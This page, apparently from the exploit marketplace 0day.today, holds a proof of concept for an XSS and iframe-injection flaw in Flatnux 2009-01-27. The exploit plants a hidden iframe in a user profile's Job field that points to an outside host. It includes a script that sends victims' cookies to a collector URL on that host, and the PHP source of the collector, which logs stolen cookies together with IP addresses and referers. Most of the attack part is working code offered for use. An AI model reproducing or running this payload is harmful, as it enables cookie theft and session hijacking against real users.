0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC
======================================================== Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC ======================================================== /* - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1] Create acount + 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username] - Set iframe in the Job fields (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>) + 3] Now m4k3 frieNdship witch Sheep Greetings : cOndemned , sid.psycho , wszyscy ktorych nikow nie umie wymowic :P and Biggest 4 g0rion l0l "... droga jest wazniejsza od celu .... :P" http://www.wrzuta.pl/audio/iL4UkPk6YK/ Alfons Luja */ <script type="text/javascript"> path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>"; location.href = path; </script> /*++++++++++++++++++collector.php++++++++++++++++++++++ <?php if(isset($_GET['kuka'])){ $gethim = $_GET['kuka']; $data = "KUKI_GRABER:\n"; $data.= date("dmY H:i:s")."\n"; $data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n"; $data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n"; $data.= "CIACHO: ".$gethim."\n"; $hnd = fopen("KUKI_FLATNUX.TXT","a"); if(!hnd) exit(666); flock($hnd,LOCK_EX); fwrite($hnd,$data); flock($hnd,LOCK_UN); fclose($hnd); } ?> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/ # 0day.today [2024-07-08] #